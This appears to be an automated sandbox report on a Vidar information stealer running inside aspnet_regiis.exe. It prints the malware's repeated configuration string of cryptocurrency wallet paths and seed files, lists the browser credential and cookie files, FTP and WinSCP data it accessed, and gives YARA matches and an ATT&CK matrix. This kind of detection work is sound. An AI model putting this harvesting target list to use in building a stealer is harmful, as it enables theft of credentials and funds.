                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara matchFile source: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.file.exe.6e820000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6e820000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6e7f0000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2960, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C980C40 sqlite3_bind_zeroblob,3_2_6C980C40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C980D60 sqlite3_bind_parameter_name,3_2_6C980D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C8A8EA0 sqlite3_clear_bindings,3_2_6C8A8EA0

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		Boot or Logon Initialization Scripts511
                          Process Injection                          		1
